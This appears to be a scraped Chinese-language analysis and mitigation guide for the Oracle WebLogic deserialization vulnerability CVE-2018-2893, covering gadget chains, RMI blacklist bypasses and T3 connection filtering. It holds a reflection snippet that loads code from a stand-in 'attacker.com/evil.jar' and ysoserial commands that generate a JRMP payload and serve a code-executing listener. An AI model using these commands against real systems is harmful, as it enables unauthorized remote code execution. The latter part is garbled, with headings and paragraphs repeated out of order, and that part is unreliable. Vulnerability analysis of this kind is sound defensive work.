WebLogic反序列化漏洞(CVE-2018-2893)深度分析与防护指南<\/h1>

一、漏洞背景<\/h2>

1.1 漏洞概述<\/h3>
CVE-2018-2893是Oracle WebLogic Server中的一个高危反序列化漏洞，允许攻击者在未授权情况下远程执行代码。该漏洞产生于WebLogic T3服务，当开放WebLogic控制台端口(默认7001)时，T3服务会默认开启。<\/p>

1.2 受影响版本<\/h3>

WebLogic 10.3.6.0<\/li>
WebLogic 12.1.3.0<\/li>
WebLogic 12.2.1.2<\/li>

WebLogic 12.2.1.3<\/li> <\/ul>

二、技术原理分析<\/h2>

2.1 漏洞关联<\/h3>
此漏洞与之前的JRMP协议漏洞(CVE-2018-2628)密切相关，结合了RMI机制缺陷和JDK反序列化漏洞绕过了WebLogic黑名单。<\/p>

2.2 反序列化利用链基础<\/h3>
在CVE-2015-4852中利用的是Commons Collections库，主要有两大利用链：<\/p>

2.2.1 TransformedMap利用链<\/h4>

核心是反射机制：<\/p>

\/\/ 反射调用java.net.URLClassLoader.class示例
<\/span><\/span><\/span><\/span>Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.net.URLClassLoader"<\/span>);<\/span>
<\/span><\/span>Method method =<\/span> clazz.<\/span>getMethod<\/span>(<\/span>"newInstance"<\/span>,<\/span> URL[].<\/span>class<\/span>);<\/span>
<\/span><\/span>Object object =<\/span> method.<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span> new<\/span> Object[]{<\/span>new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"http:\/\/attacker.com\/evil.jar"<\/span>)}});<\/span>
<\/span><\/span><\/code><\/pre>关键反射方法在InvokerTransformer<\/code>中的transform<\/code>方法，通过反序列化调用该方法。<\/p>
调用链：<\/p>
AnnotationInvocationHandler.readObject() 
→ MapEntry.setValue() 
→ TransformedMap.checkSetValue() 
→ transform()
<\/code><\/pre>
2.2.2 LazyMap利用链<\/h4>

LazyMap.get()<\/code>调用transform()<\/code>方法<\/li>
AnnotationInvocationHandler.invoke()<\/code>调用get()<\/code>方法<\/li>
通过动态代理方式触发<\/li>
<\/ul>
2.3 RMI绕过机制<\/h3>

CVE-2017-3248和CVE-2018-2628漏洞都利用了RMI的序列化\/反序列化<\/li>
CVE-2018-2628利用java.rmi.activation.Activator<\/code>接口绕过黑名单（之前只封堵了java.rmi.registry.Registry<\/code>）<\/li>
<\/ul>
2.4 JDK反序列化漏洞利用<\/h3>
当Commons Collections补丁修复后，攻击者转向利用JDK自身的反序列化漏洞：<\/p>
2.4.1 JDK7u21利用链<\/h4>

创建恶意的TemplatesImpl<\/code>对象存入LinkedHashSet<\/code><\/li>
LinkedHashSet<\/code>→HashSet<\/code>→readObject()<\/code>→put()<\/code><\/li>
利用hash绕过：proxy.hashCode() == templates.hashCode()<\/code><\/li>
关键字符串："f5a5a608"<\/code>（用于hash绕过）<\/li>
<\/ul>
2.4.2 JDK8u20利用链<\/h4>
在JDK7u21基础上改进：<\/p>

插入BeanContextSupport<\/code>对象绕过异常中断<\/li>
利用BeanContextSupport.readObject()<\/code>中的continue<\/code>语句<\/li>
需要调整偏移量<\/li>
<\/ul>
三、漏洞复现<\/h2>
3.1 利用工具<\/h3>
使用ysoserial工具生成payload：<\/p>
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar JRMPClient2 "攻击者IP:1099"<\/span> > payload_1
<\/span><\/span><\/code><\/pre>3.2 攻击步骤<\/h3>

攻击者通过T3协议发送payload到WebLogic<\/li>
WebLogic的RMI通过JRMP与攻击者服务器通信<\/li>
攻击者服务器下发JDK7u21的payload<\/li>
WebLogic执行恶意代码（如弹出计算器）<\/li>
<\/ol>
监听服务器设置：<\/p>
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099<\/span> Jdk7u21 "calc.exe"<\/span>
<\/span><\/span><\/code><\/pre>四、防护措施<\/h2>
4.1 官方补丁<\/h3>
Oracle已在2018年7月关键补丁更新中修复此漏洞，建议用户：<\/p>

使用正版软件许可账户登录Oracle支持网站<\/a><\/li>
下载并安装最新补丁<\/li>
<\/ol>
4.2 临时解决方案<\/h3>
通过控制T3协议访问权限临时阻断漏洞利用：<\/p>

修改WebLogic默认连接筛选器weblogic.security.net.ConnectionFilterImpl<\/code><\/li>
配置规则限制T3及T3S协议的访问<\/li>
<\/ol>
示例配置：<\/p>
<connection-filter><\/span>
<\/span><\/span>    <connection-filter-rule><\/span>
<\/span><\/span>        <protocol><\/span>t3<\/protocol><\/span>
<\/span><\/span>        <deny><\/span>true<\/deny><\/span>
<\/span><\/span>    <\/connection-filter-rule><\/span>
<\/span><\/span>    <connection-filter-rule><\/span>
<\/span><\/span>        <protocol><\/span>t3s<\/protocol><\/span>
<\/span><\/span>        <deny><\/span>true<\/deny><\/span>
<\/span><\/span>    <\/connection-filter-rule><\/span>
<\/span><\/span><\/connection-filter><\/span>
<\/span><\/span><\/code><\/pre>五、总结<\/h2>
CVE-2018-2893漏洞展示了反序列化攻击的持续演变：<\/p>

从Commons Collections到JDK自身漏洞的利用转变<\/li>
结合RMI机制绕过黑名单限制<\/li>
利用异常处理机制绕过防护<\/li>
<\/ol>
企业应及时应用补丁，并持续监控WebLogic等中间件的安全更新，同时实施深度防御策略，限制不必要的网络协议访问。<\/p>

WebLogic反序列化漏洞(CVE-2018-2893)深度分析与防护指南<\/h1>

一、漏洞背景<\/h2>

1.1 漏洞概述<\/h3> CVE-2018-2893是Oracle WebLogic Server中的一个高危反序列化漏洞，允许攻击者在未授权情况下远程执行代码。该漏洞产生于WebLogic T3服务，当开放WebLogic控制台端口(默认7001)时，T3服务会默认开启。<\/p>

二、技术原理分析<\/h2>

2.1 漏洞关联<\/h3> 此漏洞与之前的JRMP协议漏洞(CVE-2018-2628)密切相关，结合了RMI机制缺陷和JDK反序列化漏洞绕过了WebLogic黑名单。<\/p>

2.2 反序列化利用链基础<\/h3> 在CVE-2015-4852中利用的是Commons Collections库，主要有两大利用链：<\/p>

2.4 JDK反序列化漏洞利用<\/h3> 当Commons Collections补丁修复后，攻击者转向利用JDK自身的反序列化漏洞：<\/p>

三、漏洞复现<\/h2>

四、防护措施<\/h2>

1.1 漏洞概述<\/h3>
CVE-2018-2893是Oracle WebLogic Server中的一个高危反序列化漏洞，允许攻击者在未授权情况下远程执行代码。该漏洞产生于WebLogic T3服务，当开放WebLogic控制台端口(默认7001)时，T3服务会默认开启。<\/p>

2.1 漏洞关联<\/h3>
此漏洞与之前的JRMP协议漏洞(CVE-2018-2628)密切相关，结合了RMI机制缺陷和JDK反序列化漏洞绕过了WebLogic黑名单。<\/p>

2.2 反序列化利用链基础<\/h3>
在CVE-2015-4852中利用的是Commons Collections库，主要有两大利用链：<\/p>

2.4 JDK反序列化漏洞利用<\/h3>
当Commons Collections补丁修复后，攻击者转向利用JDK自身的反序列化漏洞：<\/p>